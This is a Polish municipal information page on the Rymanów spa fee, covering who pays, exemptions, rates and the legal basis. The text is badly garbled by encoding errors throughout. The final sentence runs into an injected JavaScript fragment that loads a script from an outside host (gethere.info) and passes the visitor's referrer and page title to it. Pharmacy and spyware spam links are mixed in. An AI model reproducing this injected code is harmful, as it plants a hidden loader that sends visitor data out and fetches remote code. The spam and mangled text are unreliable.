OPA?ATA UZDROWISKOWA


OpAi??ata uzdrowiskowa jest pobierana od osA?b fizycznych przebywajAi??cych dAi??uA?ej niA? dobAi?? w celach zdrowotnych, turystycznych, wypoczynkowych lub szkoleniowych w miejscowoAi??ciach znajdujAi??cych siAi?? na obszarach, ktA?rym nadano status uzdrowiska na zasadach okreAi??lonych w ustawie z dnia 28 lipca 2005 r. o lecznictwie uzdrowiskowym, uzdrowiskach i obszarach ochrony uzdrowiskowej oraz o gminach uzdrowiskowych (Dz. U. Nr 167, poz. 1399 ze zm.), za kaA?dy dzieAi?? pobytu w takich miejscowoAi??ciach.

OpAi??aty uzdrowiskowej nie pobiera siAi?? (zwolnienia ustawowe):

pod warunkiem wzajemnoAi??ci – od czAi??onkA?w personelu przedstawicielstw dyplomatycznych i urzAi??dA?w konsularnych oraz innych osA?b zrA?wnanych z nimi na podstawie ustaw lub zwyczajA?w miAi??dzynarodowych, jeA?eli nie sAi?? obywatelami polskimi i nie majAi?? miejsca pobytu staAi??ego na terytorium Rzeczypospolitej Polskiej;
od osA?b przebywajAi??cych w szpitalach;
od osA?b niewidomych i ich przewodnikA?w;
od podatnikA?w podatku od nieruchomoAi??ci z tytuAi??u posiadania domA?w letniskowych poAi??oA?onych w miejscowoAi??ci, w ktA?rej pobiera siAi?? opAi??atAi?? miejscowAi?? albo uzdrowiskowAi??;
odAi?? zorganizowanych grup dzieci i mAi??odzieA?y szkolnej.
Zasady ustalania i poboru oraz terminy pAi??atnoAi??ci i wysokoAi??Ai?? stawek opAi??aty okreAi??la, w drodze uchwaAi??y, rada gminy.

Stawki opAi??aty uzdrowiskowej:

od osA?b fizycznych, ktA?re ukoAi??czyAi??y 15 lat w wysokoAi??ci 3,00 zAi??.
od osA?b fizycznych, ktA?re nie ukoAi??czyAi??y 15 lat w wysokoAi??ci 1,50 zAi??.
od kombatantA?w posiadajAi??cych waA?nAi?? legitymacjAi??, legalnie dziaAi??ajAi??cej na terenie Rzeczypospolitej Polskiej organizacji kombatanckiej 1,50 zAi??.
Podstawa prawna:

art. 17 i 19 ustawy z dnia 12 stycznia 1991 r. o podatkach i opAi??atach lokalnych ( Dz.U. z 2006 Nr 121, poz.844 ze zm.)
UchwaAi??a Nr II/10/06 Rady Miejskiej w Rymanowie z dniaAi?? 30 listopada 2006 r. w sprawie okreAi??lenia wysokoAi??ci stawek opAi??aty uzdrowiskowej oraz zarzAi??dzenia jej poboru w drodze inkasa i wyznaczenia dla inkasentA?w terminA?w pAi??atnoAi??ci podatku od posiadania psA?w i opAi??at lokalnychs.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‚&default_keyword=’ + encodeURIComponent(document.title) + ”; fda approved canadian pharmacies http://sd4e.businessinnovationfactory.com/?p=19138 cheap torsemide var d=document;var s=d.createElement(‚script’); Buy order propranolol online without prescription http://vinotecarestaurantegalia.com/phone-spyware-keylogger-for-android-mobile-phone-spy/